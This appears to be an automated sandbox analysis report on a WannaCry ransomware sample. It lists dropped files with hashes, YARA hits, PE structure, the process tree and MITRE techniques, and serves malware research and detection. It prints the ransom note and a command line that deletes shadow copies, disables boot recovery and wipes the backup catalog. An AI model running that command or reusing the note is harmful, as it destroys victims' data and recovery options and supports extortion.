18:21:03	API Interceptor	29177225x Sleep call for process: LisectAVT_2403002A_126.EXE.exe modified

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.708686542546707
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
MD5:	F97D2E6F8D820DBD3B66F21137DE4F09
SHA1:	596799B75B5D60AA9CD45646F68E9C0BD06DF252
SHA-256:	0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
SHA-512:	EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
Malicious:	false
Yara Hits:	Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

Process:	C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18574
Entropy (8bit):	6.052509504403843
Encrypted:	false
SSDEEP:	384:rh4YVc1h19MY4JVtG1hIcCyzd4ReWVVNX1hPb50IU4mV91h5/ea4igBVA1hrqWdi:lxyhBELGf/5Ie+PXjb+3jnt2a9gBSyGi
MD5:	BB1498040C4D592A698665ECB5552FC4
SHA1:	E576260E83F917B11A5D28D8FFC57413AD20692A
SHA-256:	CB1F88242133D0F0A521904FA8A1FAD457A8114F2DF618CFA882A2AE4513FF6F
SHA-512:	12799A46C71E41FCD634959C06DB5F5C7182DD191D58C5D28A5435B4956B41CFE785B2DFBEDE86197DB7D37258F374924E892A672DA29E2840583E9B6E18AB9D
Malicious:	false
Reputation:	unknown
Preview:	dir-key-certificate-version 3..fingerprint E8A9C45EDE6D711294FADF8E7951F4DE6CA56B58..dir-key-published 2023-04-25 08:58:01..dir-key-expires 2024-10-25 08:58:01..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu/DOrbv/4IAYvyxsy/6ivC3q5yCQBWLKHZGYKQa5G/3rem8wen0f..qF7y4ye6U6faWc5kcNMHEKMIeBzMErxwF345qoGHITxbbOWnizgwPgrdCwlK3p0H..1XZGU/TTjoaM25P+ZNCBvGmDQRAtgs2odnv+i8hpu6vrcAUZYXmmw/Ag1Ou2AlLC..mPpbjV1O5SMylgC4IuCBPr3iA+M1kKkvj4LmwU6pJxjAae76GLzzQ/Ffvi7rRpvU..2BHetjehk+7/t8izgbhT4VABtzKgrv9ATnhfEgPeT/WBq0E75iciBBAXRPF5kEA4..k++NPy21XpL7jkQ4wnMs2HyiFhHbUwbLcoyQ/JVq/WBboSwStYbkdizRpkhJ1eNg..LiD8CPWcZnhWZi9VWrwT0xl+Mu4v6kwo9kVnXhOfcK8Wni9FqiBu2tmNDoGPG1Ac..wptYQSIoujuLgn4MARREwo9cWrKp2w+D7Dt4U7U5OrXL7TXjonEKuEHwRhzz1JA8..7LXm/wENwn1/AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAv28sclFL4zONBiZYTd2gE8dHTId7hsjP98H4PcY+IeVPs2hqdCTA..O0SsaOEGL9kGzzhWr7NUujDzHJ6j9xiCj4vePC/78/lN5tihjTD4TNzcrxEI6K08..mE6B5iXyuafojb7d1/3ssZ/qDjyj

Process:	C:\Windows\SysWOW64\cscript.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 25 21:20:31 2024, mtime=Thu Jul 25 21:20:31 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.134947904596006
Encrypted:	false
SSDEEP:	12:8x8ypzYNbfICth9wXoUoBjAQob8w2n6nlmCt:8x8B18iAl8sm
MD5:	59B6882586C7F42B0BA0EFED3935138A
SHA1:	18728D8CE887741D47D544B076ABD2326A55CCEA
SHA-256:	46ED06AF448385476C6F90D4A7065F86A637AD3BF59D47E513B4530960895A70
SHA-512:	5DCBADB58F8AF16BC86DEC6EA6FD94125E164D079334DB65FEF6BB10CD0E00895A62E6F7FFCF00D6CE0DAB9DF7A49481ADDD5D388BF492D9A2636539C9E769B4
Malicious:	true
Reputation:	unknown
Preview:	L..................F.... ...'Nv.....'Nv......`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....5.......5........t.2......J.2 .@WANAD~1.EXE..X.......X...X................................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............\|......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......210979..............n4UB.. .\|..oV.M..J...9.P..#.....n4UB.. .\|..oV.M..J...9.P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3197106
Entropy (8bit):	6.130063064844696
Encrypted:	false
SSDEEP:	98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
MD5:	6ED47014C3BB259874D673FB3EAEDC85
SHA1:	C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
SHA-256:	58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
SHA-512:	3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......... ........!.....J... ..0...........`.....c..........................!.......0...@... .........................A....`..\.......<.......................h...................................................4c...............................text....H.......J..................`.p`.data...\d...`...f...P..............@.`..rdata..............................@.`@.bss.........p........................`..edata..A............V..............@.0@.idata..\....`......................@.0..CRT....,...........................@.0..tls.... ............ ..............@.0..rsrc...<............"..............@.0..reloc..h............(..............@.0B/4............ ......& .............@.@B/19.....;z.... ..\|...( .............@..B/31.....`....@!....... .............@..B/45.....'....`!....... .............@..B/57...........!....... .............@.0B/70.....".....!....... .

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	199
Entropy (8bit):	4.993433402537439
Encrypted:	false
SSDEEP:	3:gponhvDCKFcsDONy+WlynJ96JS2x9rbPONy+WlynJSK2Fvn:e+hvbnRoJgJSoPnRoJSK2Fv
MD5:	BC117AC292350CB5C49A0D1660AFF679
SHA1:	FB6A629B267BBF4E7E4BC63B299F92DC1E518D4D
SHA-256:	E7325F2A555AE1A1694951B7782C4159013597C2D5BF480CC091C6A0E66BFC64
SHA-512:	B66227CF3944AF105818176FA43F628F89E4393B372949BC86A7513E11B62209B96B169C33E836E32C8BBA4387B78844A9FB08F37F62EC1E05DEF2F2BF89B093
Malicious:	true
Reputation:	unknown
Preview:	SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..

Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.305255793112395
Encrypted:	false
SSDEEP:	3:8yzGc7C1RREal:nzGtRV
MD5:	6ED2062D4FB53D847335AE403B23BE62
SHA1:	C3030ED2C3090594869691199F46BE7A9A12E035
SHA-256:	43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
SHA-512:	C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
Malicious:	false
Reputation:	unknown
Preview:	ERROR:...Description = Initialization failure...

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.995467986215682
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002A_126.EXE.exe
File size:	3'514'376 bytes
MD5:	c98e7230adb1ba8d2f2082ca885068bb
SHA1:	523a6fdf84bc1b0eec54d9532b3dbe564f29af38
SHA256:	6cf41e72620cafb1577415d626dbb66c8c796d7167164ca091a27c4273378a20
SHA512:	fd20a85e28ca7e4db3015299ce2b047c7868978ca98e170f3251b831b70214f6b4466b2e324edd9e5df33672d918be68929c975838dde8e877c94ea60d57c641
SSDEEP:	98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3:QqPe1Cxcxk3ZAEUadzR8yc4g
TLSH:	F4F533F4E221B7ACF2550EF64855C59B6A9724B2EBEF1E26DA8001A70D44F7F8FC0491
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..

Entrypoint:	0x4077ba
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	68f013d7437aa653a8a98a05807afeb1

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd5a8	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x349fa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x1d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x69b0	0x7000	920e964050a1a5dd60dd00083fd541a2	False	0.5747419084821429	data	6.404235106100747	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x5f70	0x6000	2c42611802d585e6eed68595876d1a15	False	0.5781656901041666	data	6.66357096840794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0x1958	0x2000	83506e37bd8b50cacabd480f8eb3849b	False	0.394287109375	Matlab v4 mat-file (little endian) ry, numeric, rows 0, columns 0	4.4557495078691405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x10000	0x349fa0	0x34a000	f99ce7dc94308f0a149a19e022e4c316	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
XIA	0x100f0	0x349635	Zip archive data, at least v2.0 to extract, compression method=deflate	English	United States	1.0002689361572266
RT_VERSION	0x359728	0x388	data	English	United States	0.46349557522123896
RT_MANIFEST	0x359ab0	0x4ef	exported SGML document, ASCII text, with CRLF line terminators	English	United States	0.42913697545526525

DLL	Import
KERNEL32.dll	GetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
USER32.dll	wsprintfA
ADVAPI32.dll	CreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
MSVCRT.dll	realloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp

Target ID:	0
Start time:	18:20:29
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe"
Imagebase:	0x400000
File size:	3'514'376 bytes
MD5 hash:	C98E7230ADB1BA8D2F2082CA885068BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.849626717.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	18:20:30
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib +h .
Imagebase:	0xf30000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	6
Start time:	18:20:31
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	16
Start time:	18:20:56
Start date:	25/07/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x7ff7ccbb0000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	17
Start time:	18:21:01
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	29
Start time:	18:21:31
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	30
Start time:	18:22:01
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	31
Start time:	18:22:08
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\@WanaDecryptor@.exe
Wow64 process (32bit):	true
Commandline:	@WanaDecryptor@.exe co
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	7BF2B57F2A205768755C07F238FB32CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001F.00000000.1847688235.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, Author: Joe Security
Has exited:	false

Target ID:	33
Start time:	18:22:09
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff777170000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002A_126.EXE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\@Please_Read_Me@.txt

C:\@WanaDecryptor@.exe

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-03.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-14.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2021-09-22.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2022-02-23.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2023-05-25.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2023-05-26.txt.WNCRY (copy)

Windows Analysis Report
LisectAVT_2403002A_126.EXE.exe

Target ID:	36
Start time:	18:22:11
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
Wow64 process (32bit):	true
Commandline:	TaskData\Tor\taskhsvc.exe
Imagebase:	0xbc0000
File size:	3'098'624 bytes
MD5 hash:	FE7EB54691AD6E6AF77F8A9A0B6DE26D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	40
Start time:	18:22:19
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Imagebase:	0x720000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	45
Start time:	18:22:31
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskse.exe
Wow64 process (32bit):
Commandline:	taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
Imagebase:
File size:	20'480 bytes
MD5 hash:	8495400F199AC77853C53B5A3F278F3E
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Execution Coverage:	24.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.2%
Total number of Nodes:	94
Total number of Limit Nodes:	1

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1683
Total number of Limit Nodes:	14

Execution Coverage:	41.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	375

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre